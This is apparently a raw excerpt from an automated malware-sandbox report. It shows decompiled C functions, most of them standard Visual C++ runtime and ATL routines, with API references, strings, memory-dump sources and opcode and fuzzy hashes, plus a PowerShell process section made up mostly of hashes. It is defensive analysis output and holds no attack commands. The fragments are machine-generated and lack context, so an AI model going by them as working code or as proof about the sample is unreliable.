                      • Opcode ID: 9b9c3a72e03a0f0d36d6f125e31b29ffb89a087418b8d4978afb7b5d348236a5
                      • Instruction ID: 26cde91a171d875055d068ac01e5e92cafb4b4c746bcbf2dea5930a0ab0ee3cc
                      • Opcode Fuzzy Hash: 9b9c3a72e03a0f0d36d6f125e31b29ffb89a087418b8d4978afb7b5d348236a5
                      • Instruction Fuzzy Hash: 0421A172D042089FDB10DFA4DC41BAEB7B4FB84314F4082AAE519A73C1DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E009D0C00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0x9d572e);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xa0600c; // 0x5d529087
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00941AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00992DE0( &_v144, 0x64, "Server Quacking for Sink No. XX.");
                      				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = L00942F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xf0000ff
                      				E009556B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E009430B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E009D14C0(_t65, 0x9d0d04);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D0C6E
                        • Part of subcall function 009556B0: VariantInit.OLEAUT32(?), ref: 009557A4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0CD2
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Quacking for Sink No. XX., xrefs: 009D0C60
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Quacking for Sink No. XX.
                      • API String ID: 2532982526-3989898170
                      • Opcode ID: 2b7b4b398dc1162dc4767e8ec309e8507326d987abc7e99d72c67efde8e15a99
                      • Instruction ID: d55fa5358fa2529da7635f7cf23aef0181001d5e1b01761956b35a4e47477493
                      • Opcode Fuzzy Hash: 2b7b4b398dc1162dc4767e8ec309e8507326d987abc7e99d72c67efde8e15a99
                      • Instruction Fuzzy Hash: DE21A172D042089FDB10DF94DC41BAEB7B4FB84314F50826AE419A73C1DB752A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E009680D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char* _t15;
                      				intOrPtr _t36;
                      				intOrPtr _t37;
                      
                      				_t15 =  *0xb30640; // 0x0
                      				if( *_t15 != 0) {
                      					_push("??_C");
                      					_v8 = L0095EFF0() - 1;
                      					_t36 =  *0xb30640; // 0x0
                      					_v12 = _t36;
                      					if(E009A2B40(_v12, "??_C", _v8) != 0) {
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					_push("??_C");
                      					_v20 = L0095EFF0() - 1;
                      					_t37 =  *0xb30640; // 0x0
                      					_v16 = _t37;
                      					 *0xb30640 = _v16 + _v20;
                      					_push(1);
                      					E00967F80(__ebx, __edi, __esi, _a4, 0);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 009680E7
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::Node::makeStatus
                      • String ID: ??_C
                      • API String ID: 637594406-1959642359
                      • Opcode ID: f40fe11a1d3c6c96578a15da6d0d058c4c7feca3630520f3960d539c767311c2
                      • Instruction ID: 49210035cb4c3901e2e0bd1dfd9d20dbc792072bb5062fbc4d20998429b9808c
                      • Opcode Fuzzy Hash: f40fe11a1d3c6c96578a15da6d0d058c4c7feca3630520f3960d539c767311c2
                      • Instruction Fuzzy Hash: D411A9B4A40204ABDB04FF58D852BAE7770BF84304F108154FC199B345EB71EA508B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0094FEA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, unsigned int _a4) {
                      				signed int _v8;
                      				char _v9;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v24;
                      				void* _t24;
                      				void* _t25;
                      				void* _t39;
                      				void* _t40;
                      
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_v9 = 0;
                      				if(_a4 != 0) {
                      					_t43 = _a4 >> 0x10;
                      					if(_a4 >> 0x10 == 0) {
                      						_v16 = _a4 & 0xffff;
                      						_t24 = E00950D40(_v8, _t43, _v16);
                      						_t44 = _t24;
                      						if(_t24 == 0) {
                      							_t25 = E0094F1C0(0xb33744);
                      							E009423E0(__ebx, __edi, __esi, _t44, E009423B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\cstringt.h", 0xa9b), _t25, 2, "Warning: implicit LoadString(%u) failed\n", _v16);
                      							_t40 = _t40 + 0x14;
                      						}
                      						_v9 = 1;
                      					}
                      				}
                      				return E009D1520(_v9, _t39 - _t40 + 0x14);
                      			}

                      APIs
                      • _Smanip.LIBCPMTD ref: 0094FF13
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h, xrefs: 0094FF0B
                      • Warning: implicit LoadString(%u) failed, xrefs: 0094FEF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h$Warning: implicit LoadString(%u) failed
                      • API String ID: 1089072215-3286162589
                      • Opcode ID: 92108192ffd056bae545b59d2827d201d6f8a518659734a7ccc5ef18e0e4a6a7
                      • Instruction ID: 5b829f85cfd33dac1d1562d52860f3546ce631a5ebb07d2eb7d27ee8d4a8d97b
                      • Opcode Fuzzy Hash: 92108192ffd056bae545b59d2827d201d6f8a518659734a7ccc5ef18e0e4a6a7
                      • Instruction Fuzzy Hash: 991152B0D04249AFDB44DFACD852FAEBBF4AF44340F4080B9F909EB281E6759A04CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 49%
                      			E00957560(long _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t9;
                      				void* _t19;
                      
                      				if( *0xb3027c == 0) {
                      					__eflags = _a4 - 0xffffffff;
                      					if(__eflags == 0) {
                      						_t9 = L00994930(__eflags, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcstartup\\src\\misc\\thread_safe_statics.cpp", 0xa6, 0, "%ls", 0);
                      						__eflags = _t9 - 1;
                      						if(_t9 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					E00957550(_t9);
                      					_t19 =  *0xb30260; // 0x0
                      					return E009574F0(WaitForSingleObjectEx(_t19, _a4, 0));
                      				}
                      				_v12 =  *0xb3027c;
                      				_v8 = _v12;
                      				 *0x9d62b0(0xb3025c, 0xb30264, _a4);
                      				return _v8();
                      			}

                      APIs
                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 009575D4
                      Strings
                      • %ls, xrefs: 009575A1
                      • d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp, xrefs: 009575AD
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ObjectSingleWait
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp
                      • API String ID: 24740636-368162206
                      • Opcode ID: 1c607698f501c956b5841168e2d70a796bde6cc7cecfeecce0ead0b288f20976
                      • Instruction ID: 517fcc7c97b1d8869d9c808050a184ffe89a717ac9699d9f459c9123322e6e31
                      • Opcode Fuzzy Hash: 1c607698f501c956b5841168e2d70a796bde6cc7cecfeecce0ead0b288f20976
                      • Instruction Fuzzy Hash: 1D01F730658308BBCB10EFA4EC4AF6EB734AB84701F204249F904571D1EA705F45CB84
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0095B220(intOrPtr* _a4, signed char _a8) {
                      				intOrPtr* _v8;
                      				intOrPtr _v12;
                      				void* _t28;
                      				void* _t36;
                      				void* _t37;
                      
                      				if((_a8 & 0x000000ff) != 0) {
                      					_v8 =  *_a4;
                      					if( *_v8 == 0xe06d7363) {
                      						_t30 = _v8;
                      						if( *((intOrPtr*)(_v8 + 0x10)) == 3) {
                      							if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_v8 + 0x14)) == 0x19930521) {
                      								L6:
                      								 *((intOrPtr*)(E0095C670(_t28, _t30, _t36, _t37) + 0x10)) = _v8;
                      								_v12 =  *((intOrPtr*)(_a4 + 4));
                      								 *((intOrPtr*)(E0095C670(_t28,  *((intOrPtr*)(_a4 + 4)), _t36, _t37) + 0x14)) = _v12;
                      								E00999BF0( *((intOrPtr*)(_a4 + 4)));
                      							} else {
                      								_t30 = _v8;
                      								if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930522) {
                      									goto L6;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return 0;
                      			}

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B26E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B282
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00942500(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v16;
                      				void* _t10;
                      				void* _t24;
                      				void* _t25;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_t10 = E0094F1D0(0xb33740);
                      				E009423E0(__ebx, __edi, __esi, __eflags, E009423B0( &_v12, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlexcept.h", 0x42), _t10, 0, "AtlThrow: hr = 0x%x\n", _a4);
                      				E009424E0( &_v16, _a4);
                      				return E009D1520(E0095BE10( &_v16, 0xa04690), _t24 - _t25 + 0x20);
                      			}










                      APIs
                      • _Smanip.LIBCPMTD ref: 0094253B
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                        • Part of subcall function 0095BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 0095BEAA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h, xrefs: 00942533
                      • AtlThrow: hr = 0x%x, xrefs: 0094251F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckExceptionRaiseSmanipStackVars@8
                      • String ID: AtlThrow: hr = 0x%x$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h
                      • API String ID: 1594162562-3884214373
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00956B65(void* __ecx) {
                      				void* __edi;
                      				long _t7;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t21;
                      
                      				_t13 = __ecx;
                      				_t21 = HeapAlloc(GetProcessHeap(), 8, 8);
                      				if(_t21 != 0) {
                      					_t19 = E0095676A(_t13, 0xb3020c);
                      					 *_t21 = 0 | _t19 == 0x00000000;
                      					if(_t19 == 0) {
                      						_t7 = E009569E3(_t19);
                      					} else {
                      						 *0x9d62b0();
                      						_t7 =  *_t19();
                      					}
                      					 *(_t21 + 4) = _t7;
                      					if(_t7 != 0) {
                      						return _t21;
                      					} else {
                      						HeapFree(GetProcessHeap(), _t7, _t21);
                      						goto L1;
                      					}
                      				} else {
                      					L1:
                      					return 0;
                      				}
                      			}









                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00944CBB), ref: 00956B6A
                      • HeapAlloc.KERNEL32(00000000,?,00944CBB), ref: 00956B71
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00944CBB), ref: 00956BB7
                      • HeapFree.KERNEL32(00000000,?,00944CBB), ref: 00956BBE
                        • Part of subcall function 009569E3: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A07
                        • Part of subcall function 009569E3: HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A0E
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$Alloc$Free
                      • String ID:
                      • API String ID: 1864747095-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:30
                      Total number of Limit Nodes:2

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: `o-k
                      • API String ID: 0-2745386557
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dec9851376fad8b9bea063c6efb5fb9367e575c6c630440b76953913f237c987
                      • Instruction ID: 3082760238fbbb1f59e12a2d66800c82a0ac57261285d0d7fcc9560deb41dfce
                      • Opcode Fuzzy Hash: dec9851376fad8b9bea063c6efb5fb9367e575c6c630440b76953913f237c987
                      • Instruction Fuzzy Hash: 45120A74A01228DFDB64DF64DC94BADBBB2BF48345F1081A9E909A73A0DB349D84CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14b39731859962b333d5cb5b079c7e22decd5dede2bf219acde7f7c8b83ded99
                      • Instruction ID: a020e9933ae4e751ef91df8761f369ea821244c9e0a3a54e87a8405540314de2
                      • Opcode Fuzzy Hash: 14b39731859962b333d5cb5b079c7e22decd5dede2bf219acde7f7c8b83ded99
                      • Instruction Fuzzy Hash: 7E915930A00618DFCB24DF69E544B9EB7F2FF88314F14856AD44AAB652D778AC45CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42e09cb00ef383312e395fd8bbe2de232115d9a0ecf1057bd6272273127414ef
                      • Instruction ID: 4fa119f23da01c01023c6bd4e54586715bcd551c47782e105b39a4127f7ad46c
                      • Opcode Fuzzy Hash: 42e09cb00ef383312e395fd8bbe2de232115d9a0ecf1057bd6272273127414ef
                      • Instruction Fuzzy Hash: 3A915B306002199FCB54DF69E894AAEBBF2FF84304F158929E442DB3A1DB74ED45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3aa6d7855e9f5386fc6ce650919677a68d401fb38f4fa1162bba489e5051f494
                      • Instruction ID: 54946a9a164aef6de0509d7dd77d92464aa20e10138684ffdea01645a772870c
                      • Opcode Fuzzy Hash: 3aa6d7855e9f5386fc6ce650919677a68d401fb38f4fa1162bba489e5051f494
                      • Instruction Fuzzy Hash: C7B11A74A04268CFDB64DF24D898BAD77B6BF48301F1585A9E40AAB3A0DB34DD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d82c31dc3ff669dfcb7d8206a82352d969e0d245b0fbce9a0adf2bb8b66de57b
                      • Instruction ID: 5f4483090960bbf6ebf50087584ab7cc50c99b1c3dc7602bf28255c25453f97c
                      • Opcode Fuzzy Hash: d82c31dc3ff669dfcb7d8206a82352d969e0d245b0fbce9a0adf2bb8b66de57b
                      • Instruction Fuzzy Hash: 17816934B152088FDB04DB68D894AAEB7F2FF89315F1480A9E506EB3A1DB35AD41CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b840ad398bf3497dbb45b243ec0c1fddd16a83c7426876cac94c8d18f7481e7
                      • Instruction ID: 128e59b1948ac593ab220568658264aaf4b371cb727517c78e4fe9fe04bc3ae4
                      • Opcode Fuzzy Hash: 5b840ad398bf3497dbb45b243ec0c1fddd16a83c7426876cac94c8d18f7481e7
                      • Instruction Fuzzy Hash: C0816634B102149FCB04DB68D484A9DBBF2FF89314F1585AAE905AB3A2DB75ED05CF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd962df19af200616255746822a6bf5dfda7be33e09a8214074d71f7f98d17b6
                      • Instruction ID: 94526a413d1344c7d2f51e770d338f68f17b5303e004a23a665b29916e084091
                      • Opcode Fuzzy Hash: cd962df19af200616255746822a6bf5dfda7be33e09a8214074d71f7f98d17b6
                      • Instruction Fuzzy Hash: 22910A74A00229DFDB64DF25DC94BADBBB2BF48345F1481A9E909A7390DB34AD84CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b792a6d625310d69a6eff5c72b5f798df620638009a80636bb6c4f28a3616f7
                      • Instruction ID: 47259e5c5e5dc78abafc58243536d86000d00a6fa7f6d29e12e62783c5af9e6d
